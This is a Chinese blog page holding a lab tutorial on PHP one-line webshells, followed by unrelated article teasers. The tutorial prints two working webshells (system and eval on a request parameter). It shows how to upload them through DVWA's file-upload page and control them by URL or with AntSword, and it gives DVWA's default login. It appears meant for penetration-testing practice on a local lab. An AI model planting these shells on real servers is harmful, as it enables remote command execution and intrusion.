news 2026/6/10 14:40:01

php一句话木马(+蚁剑)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
php一句话木马(+蚁剑)

一.php一句话木马

一句话木马是一种极简的WebShell,常用于渗透测试中远程执行代码。它通常通过文件上传、代码注入等方式植入目标服务器。

二.实验环境(在同一局域网中)

靶机为Mstasploitable2-linux的DVWA

攻击方为kali,windows

三.构造shell.php

可以直接在桌面上创建文档

写入代码,新建文件shell.php

<?php system($_REQUEST ['cmd']);?>

四.主机查看IP,nmap

五.文件上传

得到靶机IP后,用火狐浏览器登录DVWA

http://靶机ip/dvwa/login.php

登录账号密码为:admin,password

到文件上传窗口

然后知道shell.php在服务器中的位置

六.远程控制

访问路径

http://靶机ip/dvwa/hackable/uploads/shell.php?cmd=ls

七.蚁剑控制

如果要用蚁剑控制的话,得把一句话木马改掉

改完后重新上传文件

<?php @eval($_REQUEST ['cmd']);?>

测试连接,连接成功后保存,可以进行操作了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/8 20:48:11

【C++】STL--从零实现stack栈和queue队列的所有关键操作

.2. stack的使用及其模拟实现函数说明接口说明stack()构造空的栈empty()检测 stack 是否为空size()返回 stack 中元素的个数push()将元素 val 压入 stack 中pop()将 stack 中尾部的元素弹出1.2.1. stack()因为我们是将stack写成一个自定义类型&#xff0c;所以构造函数、析构函…

作者头像 李华
网站建设 2026/6/10 1:03:58

模组管理革命:智能工具重构你的游戏世界

模组管理革命&#xff1a;智能工具重构你的游戏世界 【免费下载链接】IronyModManager Mod Manager for Paradox Games. Official Discord: https://discord.gg/t9JmY8KFrV 项目地址: https://gitcode.com/gh_mirrors/ir/IronyModManager 还在为游戏模组管理而头疼吗&am…

作者头像 李华
网站建设 2026/6/10 15:39:43

PaddleSlim模型剪枝实战:轻量化部署移动端AI应用

PaddleSlim模型剪枝实战&#xff1a;轻量化部署移动端AI应用 在智能手机、IoT设备和嵌入式系统日益普及的今天&#xff0c;用户对“即时响应”“低功耗运行”的AI功能需求愈发强烈。然而&#xff0c;一个训练得再精准的深度学习模型&#xff0c;若在手机上识别一张图片要两秒、…

作者头像 李华
网站建设 2026/6/9 22:46:39

如何快速配置Zotero插件:Ethereal Style完整使用指南

如何快速配置Zotero插件&#xff1a;Ethereal Style完整使用指南 【免费下载链接】zotero-style zotero-style - 一个 Zotero 插件&#xff0c;提供了一系列功能来增强 Zotero 的用户体验&#xff0c;如阅读进度可视化和标签管理&#xff0c;适合研究人员和学者。 项目地址: …

作者头像 李华
网站建设 2026/6/10 13:44:36

Umi-OCR排版优化终极指南:7个技巧让识别结果完美呈现

Umi-OCR排版优化终极指南&#xff1a;7个技巧让识别结果完美呈现 【免费下载链接】Umi-OCR Umi-OCR: 这是一个免费、开源、可批量处理的离线OCR软件&#xff0c;适用于Windows系统&#xff0c;支持截图OCR、批量OCR、二维码识别等功能。 项目地址: https://gitcode.com/GitHu…

作者头像 李华
网站建设 2026/6/10 4:40:07

React-Markdown终极指南:现代化Markdown渲染的实战应用

React-Markdown终极指南&#xff1a;现代化Markdown渲染的实战应用 【免费下载链接】react-markdown Markdown component for React 项目地址: https://gitcode.com/gh_mirrors/re/react-markdown 在当今内容驱动的Web应用中&#xff0c;如何高效地将Markdown内容转化为…

作者头像 李华